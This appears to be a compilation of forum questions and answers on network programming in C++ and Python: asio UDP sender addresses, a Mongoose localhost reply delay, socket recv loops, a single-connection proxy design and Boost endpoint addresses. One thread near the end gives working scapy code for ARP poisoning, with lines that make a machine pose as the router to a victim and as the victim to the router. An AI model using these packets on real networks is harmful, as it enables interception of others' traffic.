I wrote a small protocol stack to connect to KNX/IP routers. The mechanism is as follows:
Discovery_Channel: For discovery, the client sends a UDP/IP packet to the multicast address 224.0.23.12. KNX/IP routers listen on this multicast address and reply. A KNX/IP router can potentially be connected to multiple KNX media, so the answer contains a list of services, each with an IP address and port, that the client can connect to.
Communication_Channel: The discovered services from all KNX/IP routers are presented to the user, who selects the service to connect to.
The problem is that the answer from the KNX/IP routers sometimes doesn't contain a valid IP address, but just 0.0.0.0. In that case I need to use the IP address the packet came from. But how can I get it with the (non-Boost) version of asio?
My code looks like this:
/** client socket */
asio::ip::udp::socket m_socket;
/** search request */
void search_request(
    const IP_Host_Protocol_Address_Information & remote_discovery_endpoint = IP_Host_Protocol_Address_Information({224, 0, 23, 12}, Port_Number),
    const std::chrono::seconds search_timeout = SEARCH_TIMEOUT);
/** search response initiator */
void Discovery_Channel::async_receive_response() {
    /* prepare a buffer */
    m_response_data.resize(256);
    /* async receive */
    m_socket.async_receive(
        asio::buffer(m_response_data),
        std::bind(&Discovery_Channel::response_received, this, std::placeholders::_1, std::placeholders::_2));
}
/** response received handler */
void Discovery_Channel::response_received(const std::error_code & error, std::size_t bytes_transferred) {
    // here the answer provided in m_response_data gets interpreted.
    // #todo how to get the IP address of the sender?
    /* start initiators */
    async_receive_response();
}
So how can I retrieve the IP address of the sender in the Discovery_Channel::response_received method? I basically only have the packet data in m_response_data available.
On datagram sockets you can (and likely should) use async_receive_from.
It takes a reference to an endpoint variable that will be set to the remote endpoint on success.
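A minimal sketch of how that could look in the code above, assuming a udp::endpoint member is added to Discovery_Channel (m_remote_endpoint is an assumed name):

/** search response initiator */
void Discovery_Channel::async_receive_response() {
    /* prepare a buffer */
    m_response_data.resize(256);
    /* async receive; m_remote_endpoint is filled with the sender's address/port on completion */
    m_socket.async_receive_from(
        asio::buffer(m_response_data),
        m_remote_endpoint,
        std::bind(&Discovery_Channel::response_received, this, std::placeholders::_1, std::placeholders::_2));
}

/** response received handler */
void Discovery_Channel::response_received(const std::error_code & error, std::size_t bytes_transferred) {
    if (!error) {
        /* the router's actual address, usable when the payload only advertises 0.0.0.0 */
        const asio::ip::address sender_address = m_remote_endpoint.address();
        // ... interpret m_response_data, falling back to sender_address where needed ...
    }
    /* start initiators */
    async_receive_response();
}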
I'm having issues building an HTTP server using the Cesanta Mongoose web server library. The issue occurs when I have an HTTP server listening on port 8080 and a client sending an HTTP request to localhost:8080. The problem is that the server processes the request fine and sends back a response, but the client only processes and prints the response after I kill the server process. Basically, Mongoose works by creating connections that take an event handler function, ev_handler(). This event handler function is called whenever an "event" occurs, such as the receiving of a request or a reply.
On the server side, the event handler function is called fine when it receives a request from the client on 8080. However, the client-side event handler function is not called when the server sends the reply; it is called only after the server process is killed. I suspected that this might have something to do with the fact that the connection is on localhost, and I was right: the issue does not occur when the client sends requests to addresses other than localhost, and the event handler function is called fine. Here is the ev_handler function on the client side for reference:
static void ev_handler(struct mg_connection *c, int ev, void *p) {
    if (ev == MG_EV_HTTP_REPLY) {
        struct http_message *hm = (struct http_message *) p;
        c->flags |= MG_F_CLOSE_IMMEDIATELY;
        fwrite(hm->message.p, 1, (int) hm->message.len, stdout);
        putchar('\n');
        exit_flag = 1;
    } else if (ev == MG_EV_CLOSE) {
        exit_flag = 1;
    }
}
Is this a common issue when trying to establish a connection on localhost with a server on the same computer?
The cause of this behavior is that the client connection does not fire an event until all data has been read. How does the client know that all data has been read? There are three possibilities:
1. The server sent a Content-Length: XXX header and the client has read XXX bytes of the message body, so it knows it has received everything.
2. The server sent a Transfer-Encoding: chunked header and sent all data chunks followed by an empty chunk. When the client receives the empty chunk, it knows it has received everything.
3. The server set neither Content-Length nor Transfer-Encoding. In this case the client does not know the size of the body, so it keeps reading until the server closes the connection.
What you see is (3). Solution: set Content-Length in your server code.
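For illustration, a minimal server-side handler that sends an explicit Content-Length, so the client's MG_EV_HTTP_REPLY fires as soon as the body has arrived instead of waiting for the connection to close. This is only a sketch: it assumes mongoose.h and string.h are included, and server_ev_handler and the reply text are placeholder names, not your actual server code.

static void server_ev_handler(struct mg_connection *c, int ev, void *p) {
    (void) p;
    if (ev == MG_EV_HTTP_REQUEST) {
        const char *reply = "hello from the server";
        /* an explicit Content-Length lets the client detect the end of the body */
        mg_printf(c,
                  "HTTP/1.1 200 OK\r\n"
                  "Content-Type: text/plain\r\n"
                  "Content-Length: %d\r\n"
                  "\r\n"
                  "%s",
                  (int) strlen(reply), reply);
    }
}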
I have a web proxy that starts a TCP listener socket that accepts connections from clients. The listener accepts connections via:
clientConnection, clientAddress = listenerSocket.accept()
and then a new thread handles the client connection from there.
To mock a client connection, I am using telnet to connect to the proxy and issue commands. The proxy needs to receive data from telnet and I need to make sure that I receive all of it. To achieve this, I am doing the following:
while True:
    requestBytes = clientConnection.recv(1024)
    if not requestBytes:
        break
    requestBuffer += requestBytes
The proxy then decodes the bytes and does some work with them that takes a little time, and then has to send a response back to the same client. However, when using the above code, the connection with clientConnection gets closed long before I can process the bytes and respond.
Here's what I don't understand, when I use the following instead:
while True:
    requestBytes = clientConnection.recv(1024)
    requestBuffer += requestBytes
    break
It works just fine and clientConnection remains intact. This obviously breaks if I receive more than 1024 bytes, but at least clientConnection does not get closed.
More specifically, the error occurs after I have a response to send to the client and call:
clientConnection.sendall(response)
clientConnection.shutdown(1)
clientConnection.close()
The line clientConnection.shutdown(1) throws the error:
[Errno 107] Transport endpoint is not connected
which is confusing because it was somehow still able to call sendall on the previous line. Note that I did not actually receive anything on the client side.
I am sure that the connection is not getting closed elsewhere in the code. What exactly is happening here and what is the best way to do something like recvall and keep the clientConnection open?
I am working on a client/server solution in C++.
From the client, I am sending data to my server, and from this server I am sending to another server. I am able to configure port and IP address, and am able to send successfully.
But the other server (which is not under my control) accepts only one TCP connection from my side; after that, only sending and receiving should happen.
If I connect twice (say, from two clients at the same time), the connection is refused.
Part of the code is shown below:
while ((len = stream->receive(input, sizeof(input)-1)) > 0)
{
    input[len] = '\0';

    //Code addition by Srini starts here
    //Client declaration
    TCPConnector* connector_client = new TCPConnector();
    printf("ip_client = %s\tport_client = %s\tport_client_int = %d\n",
           ip_client.c_str(), port_client.c_str(), atoi(port_client.c_str()));
    TCPStream* stream_client = connector_client->connect(ip_client.c_str(), atoi(port_client.c_str()));
    //Client declaration ends

    if (stream_client)
    {
        //message = "Is there life on Mars?";
        //stream_client->send(message.c_str(), message.size());
        //printf("sent - %s\n", message.c_str());
        stream_client->send(input, sizeof(input));
        printf("sent - %s\n", input);
        len = stream_client->receive(line, sizeof(line));
        line[len] = '\0';
        printf("received - %s\n", line);
        delete stream_client;
    }
    //Code addition by Srini ends here

    stream->send(line, len);
    printf("thread %lu, echoed '%s' back to the client\n",
           (long unsigned int)self(), line);
}
The full thread code (receiving from the client, sending to the server, receiving from the server, and sending back to the client) is shown at the link below:
https://pastebin.com/UmPQJ70w
How can I change my design flow? Even in a basic client/server diagram, each time the client calls connect(), the server calls accept(), and then sending/receiving happens. So what can be done to modify the flow so that the client connects only once?
Your intermediate server (which is acting as a proxy, so let's call it that) needs to maintain a single connection to the other server and handle messaging with it in parallel with the messaging between your proxy and its clients.
I would suggest creating a separate thread whose sole task is to maintain that connection to the other server, and to send/receive messages with it.
When a client sends a message to your proxy, place the message in a thread-safe queue somewhere. Have the thread check the queue periodically and send any queued messages to the other server.
When the other server sends a message to your proxy, the thread can receive it and forward it to the appropriate client.
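A rough sketch of that worker-thread-plus-queue idea, assuming the outgoing direction only; names such as UpstreamWorker and deliver are placeholders, not your TCPStream API:

#include <condition_variable>
#include <functional>
#include <mutex>
#include <queue>
#include <string>
#include <thread>

class UpstreamWorker {
public:
    // deliver is whatever actually writes a message to the single long-lived
    // connection to the other server (e.g. a wrapper around your stream).
    explicit UpstreamWorker(std::function<void(const std::string &)> deliver)
        : m_deliver(std::move(deliver)), m_thread([this] { run(); }) {}

    ~UpstreamWorker() {
        {
            std::lock_guard<std::mutex> lock(m_mutex);
            m_stop = true;
        }
        m_cv.notify_one();
        m_thread.join();
    }

    // Called from any client-handling thread: just queue the message.
    void enqueue(std::string message) {
        {
            std::lock_guard<std::mutex> lock(m_mutex);
            m_queue.push(std::move(message));
        }
        m_cv.notify_one();
    }

private:
    void run() {
        for (;;) {
            std::unique_lock<std::mutex> lock(m_mutex);
            m_cv.wait(lock, [this] { return m_stop || !m_queue.empty(); });
            if (m_stop && m_queue.empty())
                return;
            std::string message = std::move(m_queue.front());
            m_queue.pop();
            lock.unlock();
            m_deliver(message);   // the single upstream connection is used only here
        }
    }

    std::function<void(const std::string &)> m_deliver;
    std::mutex m_mutex;
    std::condition_variable m_cv;
    std::queue<std::string> m_queue;
    bool m_stop = false;
    std::thread m_thread;
};

Client-handling threads only ever call enqueue(); the single upstream connection is touched exclusively by the worker thread, which is what keeps the other server seeing just one connection from your side.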
I am trying to use the "IP is at MAC address" option but can't figure out how to do so. Here is my code at the moment:
from scapy.all import *
victim = "192.168.5.51"
spoof = "192.168.5.46"
op=2
mac = "88:00:2e:00:87:00"
while True:
    arp = ARP(op=op, psrc=spoof, pdst=victim, hwdst=mac)
    send(arp)
What I am looking for is to send the victim's IP an ARP packet with the default gateway's IP/MAC, and to send the gateway the IP/MAC of the attacker.
The attack is ARP poisoning.
It's a bit unclear what you're trying to achieve, but if all that you're interested in is creating an ARP reply of the form "192.168.5.51 is at 00:00:00:00:00:00", in which the values of all other fields are irrelevant, then this should suffice:
send(ARP(op=ARP.is_at, psrc='192.168.5.51', hwsrc='00:00:00:00:00:00'))
EDIT:
This sends the victim an ARP reply packet with the local machine masquerading as the router:
send(ARP(op=ARP.is_at, psrc=router_ip, hwdst=victim_mac, pdst=victim_ip))
This sends the router an ARP reply packet with the local machine masquerading as the victim:
send(ARP(op=ARP.is_at, psrc=victim_ip, hwdst=router_mac, pdst=router_ip))
In both of these packets, the hwsrc field is filled by default with the local machine's MAC address.
I have the following connection set up, and it works correctly. This is part of a larger piece of code that listens (on a free port) for incoming messages. What I am trying to do is publish the URI so that other clients can connect to it. However, I cannot figure out a way for endpoint.address() to report the actual IP address of the interface being used rather than "localhost". Any ideas?
tcp::resolver::query query(address, "");
tcp::endpoint endp = *resolver.resolve(query);
acc.open(endp.protocol());
acc.set_option(reuse_address(true));
acc.bind(endp);
acc.listen();

tcp::endpoint endpoint = acc.local_endpoint();
string uri = "tcp://" + endpoint.address().to_string() + ":" + lexical_cast<string>(endpoint.port());
Boost ASIO has no way to enumerate all the interfaces of your computer. The resolver queries DNS for your IP, which is not the same thing: it can return whatever is configured there (even inaccurate information).
If you want to bind to the default interface, you don't need to resolve anything.
Just create the socket with the following endpoint:
boost::asio::ip::tcp::endpoint endpoint =
    boost::asio::ip::tcp::endpoint(boost::asio::ip::tcp::v4(), port);
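If you do want a concrete address to publish in the URI, one common workaround is the resolver-based lookup mentioned above: resolve the machine's own host name and pick a non-loopback entry from the results. A sketch under that assumption (function name is a placeholder, and the result is only as accurate as the host's name resolution):

#include <boost/asio.hpp>
#include <string>

std::string first_non_loopback_v4(boost::asio::io_service & io)
{
    using boost::asio::ip::tcp;
    tcp::resolver resolver(io);
    // Resolve this machine's own host name and scan the returned addresses.
    tcp::resolver::query query(boost::asio::ip::host_name(), "");
    for (tcp::resolver::iterator it = resolver.resolve(query), end; it != end; ++it)
    {
        const boost::asio::ip::address addr = it->endpoint().address();
        if (addr.is_v4() && !addr.is_loopback())
            return addr.to_string();   // candidate for the published URI
    }
    return "127.0.0.1";   // fallback if nothing better was found
}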